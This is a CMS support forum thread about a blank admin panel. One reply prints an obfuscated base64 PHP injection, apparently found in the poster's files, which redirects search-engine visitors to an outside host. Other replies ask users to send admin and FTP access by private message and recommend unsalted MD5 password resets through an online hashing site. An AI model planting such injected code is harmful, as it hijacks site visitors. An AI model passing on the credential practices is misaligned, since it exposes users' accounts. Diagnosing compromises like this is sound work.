Elxis CMS Forum
Support => General => Topic started by: creativeidea on July 03, 2012, 15:51:03
-
I didn't make any change one day before i worked everything was fine . When i log in today in administration panel, it only shows black toolbar in the top.
and everything else was disappear. I repeat looks only toolbar on the top and only white page.
Did anyone know where is the problem ?
Waiting for your news ?
Thanks in advanced
-
Welcome creativeidea on Elxis Community!
Can you please send me a private message including a live URL and administrator access. As i realize it wasn't an issue came from browser compatibility!
-
An attack has been made on your server. All of the PHP files has been inflected with the below piece of code :
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGlvcG8uMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
More details: https://forum.elxis.org/index.php?topic=7109.msg45724#msg45724
Conclusion: Take a look at the attached image
-
Did you know how to resolve this problem ?
-
This happened to a client of mine.
http://www.do-my-site.net/eblog/the-tech-blog-of-do-my-site/viruses-and-trojans-do-attack-websites.html (http://www.do-my-site.net/eblog/the-tech-blog-of-do-my-site/viruses-and-trojans-do-attack-websites.html)
-
I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.
Already a clean install of Elxis later than 9.1 does not give me access to the admin section. So, if somebody knows a how to, I would thankfully take any hint (we are holding more than 10 elxis sites).
At this moment, not one of our sites runs really clean.
I am already so far, that - with 9.1, a clean install, we can access the admin back-end, if we connect to our original database, we can't. The same same happens, if we only import data. So it seems somehow database related.
-
I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.
That's not correct. To access the administration area, you must enter http://www.sitename.com/administrator/index.php or anything.php if you have turned ON the "Login page cloak".
* never forget the www. prefix
-
I also do experience that since a while. Some of my sites I can open, when entering manually http://sitename.com/index2.php. In some site, I can't access at all the admin section.
That's not correct. To access the administration area, you must enter http://www.sitename.com/administrator/index.php or anything.php if you have turned ON the "Login page cloak".
* never forget the www. prefix
Yes, I still get the login screen- prior it moves, that is however not the point.
And to say it ones more, if /index2.php is not entered, it's not moving after the login
-
It seems odd, doesn't it that this person is not providing any additional real information.
I'm thinking that this is a new kind of spammer.
-
It seems odd, doesn't it that this person is not providing any additional real information.
I'm thinking that this is a new kind of spammer.
And which real information would you like to get Mr Thinker. I think, you think to much and wrong.
-
Feel free to provide additional information to your problem.
-
Additional information? Shoe size? Shade of white after logging in?
-
Can you please send me Billy access (FTP + Administrator) to your website via Private Message?
-
Issues solved (as bully can verify it).
- First of all it's totally recommended to use the latest version of elxis cms. So i suggest you to upgrade it till Elxis 2009.3 Aphrodite rev 2691.
This issue caused by the time we are on Global settings task at the administrator area. When we make some change there and click save ... Firefox ask to save the password or something like that. We must avoid this message. Otherwise it changes the password of website and we loose the existing password of logged in user.
Solution
- Connect to phpMyAdmin tool through f.e: cPanel (control panel of our website)
- Select the database -> (table) elx_users.
- Edit an administrator account
- change the existing password using this tool http://md5-hash-online.waraxe.us/
For example the md5 hash calculator for the password: elxisnautilus corresponds to 147c19aad66da49b207706f676991be4
Important: Don't use space character.
- Save the changes and login to the administrator area.
Other suggestions
- Please make the use of Login cloak page. More information on wiki: http://wiki.elxis.org/wiki/Administrator_login_page_cloak
-
I can confirm, the 1st. site is now accessible.
Thanks again
In my limited understanding, I will try to recap, what I understand.
- For some reason the password has been changed/corrupted
That raises again a question for me - why does Elxis just "accept" the "wrong" password?
As for the cloaking page - yes, we gonna do that, one by one, since ages actually aware of that option, but we never "needed" it
-
It's not an Elxis fault. You can edit the global settings by the time that configuration.php file have the proper permissions. So the browser / configuration.php file permissions assume that. Cloaking pages are suggested for security reasons.
Note for Elxis 4.0 Nautilus:
On Elxis 4.x Nautilus you can rename the administrator folder to anything you want. Also the administrator folder was renamed to "estia" (meaning "home" or "fire place" in Greek).
Important:
Change the control panel's password.